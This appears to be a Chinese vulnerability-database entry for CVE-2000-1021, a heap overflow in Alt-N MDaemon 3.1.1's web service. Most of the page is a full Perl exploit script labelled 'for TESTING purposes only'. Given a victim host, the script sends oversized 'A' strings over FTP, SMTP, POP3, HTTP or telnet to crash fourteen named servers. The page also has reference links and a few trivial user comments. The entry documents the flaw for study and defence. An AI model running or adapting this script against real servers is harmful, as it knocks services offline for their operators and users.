Alt-N MDaemon 3.1.1 DoS漏洞
漏洞ID | 1105627 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 1999-12-01 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2000-1021 |
CNNVD-ID | CNNVD-200012-063 |
漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Mdaemon3.1.1版本和之前版本中WebConfig存在基于堆缓冲区溢出漏洞。远程攻击者可以借助超长URL导致服务拒绝和可能执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1689/info
Alt-N MDaemon 3.1.1 is subject to a denial of service. If a remote user requests a specially crafted URL to the web services within MDaemon the service will crash. A restart of the service is required in order to gain normal functionality.
#!/usr/bin/perl
#####################################################################
# Based upon advisories by USSR (www.ussrback.com) #
# #
# Demonstration script to remotely overflow various server buffers, #
# resulting in a denial of service, for TESTING purposes only. #
# Runs on *nix & WinXX with perl & Net::Telnet available from CPAN #
# #
# G6 FTP Server v2.0 beta4/5 #
# MDaemon httpd Server v2.8.5.0 #
# Avirt Mail Server v3.5 #
# BisonWare FTP Server v3.5 #
# Vermillion FTP Server v1.23 #
# ZetaMail POP3 Server v2.1 #
# WFTPD FTP Server 2.40 #
# BFTelnet Server v1.1 #
# Broker FTP Server v3.5 #
# ExpressFS FTP server v2.x #
# XtraMail POP3 Server v1.11 #
# Cmail SMTP Server v2.4 #
# PakMail SMTP/POP3 v1.25 #
# #
# December '99 #
#####################################################################
use IO::Socket;
use Getopt::Std;
#use Net::Telnet;
getopts('h:p:t:u:v', %args);
if(!defined($args{h}) && !defined($args{t})) {
print qq~Usage: $0 -h <victim> -t <number> ((-u username) | (-p password)) | -v
-h victim to test remote overflow DoS on
-t server type (check the -v option for list)
-u username authorisation (required if server prompts for username)
-p password authentication (required if user/passwd is expected)
-v lists all servers vulnerable to each DoS
~; exit; }
if(defined($args{u})) { $user=$args{u}; }
if(defined($args{p})) { $pass=$args{p}; }
if(defined($args{v})) { &vulnerable; }
if(defined($args{h}) && defined($args{t})){
if(($args{t}) == 1) { &G6; }
if(($args{t}) == 2) { &mdaemon; }
if(($args{t}) == 3) { &avirt; }
if(($args{t}) == 4) { &bisonware; }
if(($args{t}) == 5) { &vermillion; }
if(($args{t}) == 6) { &zetamail; }
if(($args{t}) == 7) { &wftpd; }
if(($args{t}) == 8) { &bftelnet; }
if(($args{t}) == 9) { &broker; }
if(($args{t}) == 10) { &expressfs; }
if(($args{t}) == 11) { &xtramail; }
if(($args{t}) == 12) { &cmail; }
if(($args{t}) == 13) { &pakmail; }
if(($args{t}) == 14) { &pakpop; }}
sub G6 {
$denial .= "A" x 2000;
$victim=$args{h};
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.n";
$socket->autoflush(1);
print $socket "$denialn"; # user
print "nSent overflow to $victimn";
close $socket; }
sub mdaemon {
$victim=$args{h};
$denial .= "A" x 1025;
$url = "/$denial";
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "80") or die "Can't connect.n";
print $socket "GET $urln";
print "nSent overflow to $victimn";
close $socket; }
sub avirt {
$victim=$args{h};
$denial .= "A" x 856;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connectn";
$socket->autoflush(1);
print $socket "user $usern";
print $socket "pass $denialn";
print "nSent overflow to $victimn";
close $socket; }
sub bisonware {
$victim=$args{h};
$denial .= "A" x 2000;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connectn";
$socket->autoflush(1);
print $socket "$denialn";
print "nSent overflow to $victimn";
close $socket; }
sub vermillion {
$victim=$args{h};
$denial .= "A" x 504;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connectn";
$socket->autoflush(1);
print $socket "$usern";
print $socket "$passn";
print $socket "cwd $denialn";
for($i=0; $i<=3; $i++) { print $socket "CWD $denialn"; }
print "nSent overflow to $victimn";
close $socket; }
sub zetamail {
$victim=$args{h};
$denial .= "A" x 3500;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "110") or die "Can't connect.n";
print $socket "user $denialn";
print $socket "pass $denialn";
print "nSent overflow to $victimn";
close $socket; }
sub wftpd {
$victim=$args{h};
$denial .= "A" x 255;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.n";
print $socket "$usern";
print $socket "$passn";
print $socket "MKDIR $denialn";
print $socket "CWD $denialn";
print "nSent overflow to $victimn";
close $socket; }
sub bftelnet {
# use Net::Telnet;
$victim=$args{h};
$denial .= "A" x 3090;
$telnet = new Net::Telnet ( Timeout =>10,
Errmode =>'die');
$telnet->open('$victim');
$telnet->waitfor('/Login: $/i');
$telnet->print('$denial');
print "nSent overflow to $victimn";
close $telnet; }
sub broker {
$victim=$args{h};
$denial .= "A" x 2730;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.n";
print $socket "$denialn";
print "nSent overflow to $victimn";
close $socket; }
sub expressfs {
$victim=$args{h};
$denial .= "A" x 654;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.n";
print $socket "$denialn";
print $socket "AAAAAAAAAAAAAAAAAAAn";
print "nSent overflow to $victimn";
close $socket; }
sub xtramail {
$victim=$args{h};
$denial .= "A" x 2930;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect.n";
print $socket "MAIL FROM: test@localhostn";
print $socket "RCPT TO: $denial@localhostn";
print "nSent overflow to $victimn";
close $socket; }
sub cmail {
$victim=$args{h};
$denial .= "A" x 7090;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect.n";
print $socket "MAIL FROM: $denial@localhostn";
print "nSent overflow to $victimn";
close $socket; }
sub pakmail {
$victim=$args{h};
$denial .= "A" x 1390;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect.n";
print $socket "MAIL FROM: test@localhostn";
print $socket "RCPT TO: $denial@localhostn";
print "nSent overflow to $victimn";
close $socket; }
sub pakpop {
$victim=$args{h};
$denial .= "A" x 1400;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "110") or die "Can't connect.n";
print $socket "user testn";
print $socket "pass $denialn";
print "nSent overflow to $victimn";
close $socket; }
sub vulnerable {
print qq~
______________________________________________________________________________
Vulnerable Daemon Version Vulnerable Daemon Version
______________________________________________________________________________
[1] G6 FTP Server v2.0b4/5 [2] MDaemon httpd Server v2.8.5.0
[3] Avirt Mail Server v3.5 [4] BisonWare FTP Server v3.5
[5] Vermillion FTP Server v1.23 [6] ZetaMail SMTP Server v2.1
[7] WFTPD FTP Server v2.40 [8] BFTelnet Server v1.1
[9] Broker FTP Server v3.5 [10] ExpressFS FTP Server v2.x
[11] XtraMail POP3 Server v1.11 [12] Cmail SMTP Server v2.4
[13] PakMail SMTP Server v1.25 [14] PakMail POP3 Server v1.25
~; exit; }
|参考资料
来源:BID
名称:1689
链接:http://www.securityfocus.com/bid/1689
来源:XF
名称:mdaemon-url-dos
链接:http://xforce.iss.net/static/5250.php
来源:BUGTRAQ
名称:20000917VIGILANTE-2000012:MdaemonWebServicesHeapOverflowDoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=96925269716274&w;=2
相关推荐: GFI Mail Essentials BCC Information Disclosure Vulnerability
GFI Mail Essentials BCC Information Disclosure Vulnerability 漏洞ID 1102638 漏洞类型 Input Validation Error 发布时间 2001-12-12 更新时间 2001-12…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666